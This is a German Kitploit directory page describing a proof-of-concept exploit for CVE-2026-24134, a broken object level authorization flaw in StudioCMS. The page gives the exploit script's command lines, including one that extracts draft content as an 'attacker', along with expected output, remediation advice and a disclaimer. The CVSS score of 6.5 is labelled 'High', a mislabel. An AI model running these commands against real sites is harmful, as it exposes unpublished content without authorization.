Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-24134-PoC — Proof-of-Concept-Exploit für CVE-2026-24134, eine Broken-Object-Level-Authorization-Schwachstelle in StudioCMS, die unbefugten Zugriff auf Entwurfsinhalte demonstriert. | Kitploit
Tools/GitHubGitHub/filipegaudard/cve-2026-24134-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationAPI-SicherheitstestsPenetrationstestsLernen & Bildung
GitHubfilipegaudard/cve-2026-24134-poc

CVE-2026-24134-PoC

Proof-of-Concept-Exploit für CVE-2026-24134, eine Broken-Object-Level-Authorization-Schwachstelle in StudioCMS, die unbefugten Zugriff auf Entwurfsinhalte demonstriert.

Repository anzeigen
vor 6 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-24134-PoC

Überblick

Dieses Repository enthält den Proof of Concept (PoC) für CVE-2026-24134, eine Broken Object Level Authorization (BOLA)-Schwachstelle in StudioCMS.

Inhalt

  • cve_2026_24134_poc.py - Python-Exploit-Skript

Voraussetzungen

  • StudioCMS<=0.1.1
root@kitploit:~
pip install requests colorama

Schnellstart

Manuelle Ausnutzung

root@kitploit:~
# Grundlegende Verwendung
python3 cve_2026_24134_poc.py \
  -u http://localhost:4321 \
  --username visitor_user \
  --password visitor_pass \
  --uuid bad87630-69a4-4cd6-bcb2-6965839dc148

# Ausgabe in Datei speichern
python3 cve_2026_24134_poc.py \
  -u http://localhost:4321 \
  --username visitor_user \
  --password visitor_pass \
  --uuid bad87630-69a4-4cd6-bcb2-6965839dc148 \
  --save

Automatisierte Tests

root@kitploit:~
python3 cve_2026_24134_poc.py \
  -u http://localhost:4321 \
  --auto-test \
  --visitor-user visitor01 \
  --visitor-pass visitorpass \
  --editor-user editor01 \
  --editor-pass editorpass \
  --uuid bad87630-69a4-4cd6-bcb2-6965839dc148

Argumente

Erforderlich

  • -u, --url - Ziel-StudioCMS-Basis-URL
  • --uuid - Ziel-UUID des Entwurfsinhalts

Manueller Modus

  • --username - Benutzername für die Authentifizierung
  • --password - Passwort für die Authentifizierung

Automatisierter Testmodus

  • --auto-test - Automatisierte Tests aktivieren
  • --visitor-user - Benutzername des Besucherkontos
  • --visitor-pass - Passwort des Besucherkontos
  • --editor-user - Benutzername des Editor-Kontos
  • --editor-pass - Passwort des Editor-Kontos

Optional

  • --save - Antwortinhalt in Datei speichern
  • --no-ssl-verify - SSL-Zertifikatsprüfung deaktivieren

Beispielszenarien

Szenario 1: Testen, ob das System verwundbar ist

root@kitploit:~
python3 cve_2026_24134_poc.py \
  --url http://target.com \
  --auto-test \
  --visitor-user test_visitor \
  --visitor-pass SecurePass123! \
  --editor-user test_editor \
  --editor-pass SecurePass456! \
  --uuid 12345678-1234-1234-1234-123456789abc

Erwartete Ausgabe, wenn verwundbar:

root@kitploit:~
[+] Successfully authenticated as test_visitor
[*] Detected user role: Visitor
[+] Successfully accessed draft content!
[!] VULNERABILITY CONFIRMED!

Erwartete Ausgabe, wenn gepatcht:

root@kitploit:~
[+] Successfully authenticated as test_visitor
[*] Detected user role: Visitor
[*] Access denied (403 Forbidden)
[+] VULNERABILITY NOT PRESENT

Szenario 2: Entwurfsinhalt extrahieren

root@kitploit:~
python3 cve_2026_24134_poc.py \
  --url http://localhost:4321 \
  --username attacker \
  --password pass123 \
  --uuid target-uuid-here \
  --save

Dadurch wird der vollständige Entwurfsinhalt in draft_{uuid}.html gespeichert.

Die Ausgabe verstehen

Erfolgsindikatoren

  • [+] - Erfolgreiche Operation (grün)
  • [*] - Informationsmeldung (blau)
  • [!] - Warnung (gelb)
  • [-] - Fehler (rot)

HTTP-Statuscodes

  • 200 OK - Verwundbar! Entwurfsinhalt wurde abgerufen
  • 403 Forbidden - Gepatcht! Ordnungsgemäße Autorisierung vorhanden
  • 404 Not Found - UUID ungültig oder sichere Implementierung (gibt 404 zurück, anstatt die Existenz preiszugeben)
  • 401 Unauthorized - Authentifizierung fehlgeschlagen

Abhilfe

Wenn Sie eine verwundbare Version von StudioCMS ausführen, aktualisieren Sie sofort auf die gepatchte Version.

Für Entwickler

Das eigentliche Problem: Autorisierungsprüfungen wurden clientseitig (JavaScript) durchgeführt, nicht serverseitig.

Laut dem Entwicklungsteam:

"Currently the rank level check to redirect is being done in client JS, which was supposed to be replaced shortly there after."

Die Lösung: Autorisierung vom Client auf den Server verlagern.

Kernprinzip: Vertraue niemals dem Client. Clientseitige Sicherheit = UX-Verbesserung. Serverseitige Sicherheit = tatsächlicher Schutz.

Rechtlicher Haftungsausschluss

WICHTIG: Dieses Tool wird ausschließlich für Bildungszwecke und autorisierte Sicherheitstests bereitgestellt.

  • Nur gegen Systeme verwenden, die Sie besitzen oder für die Sie eine ausdrückliche schriftliche Genehmigung zum Testen haben
  • Unbefugter Zugriff auf Computersysteme ist in den meisten Rechtsordnungen illegal
  • Der Autor übernimmt keine Haftung für Missbrauch dieses Tools
  • Befolgen Sie stets verantwortungsvolle Offenlegungspraktiken

Referenzen

  • CVE: CVE-2026-24134
  • CVSS: 6.5 High
  • CWE: CWE-639
  • OWASP: API1:2023 - Broken Object Level Authorization

Kontakt

Bei Fragen zu diesem PoC oder der Schwachstelle:

  • Autor: Filipe Gaudard

Lizenz

Dieser PoC wird zu Bildungszwecken veröffentlicht. Verwenden Sie ihn verantwortungsvoll und ethisch.

Tool herunterladen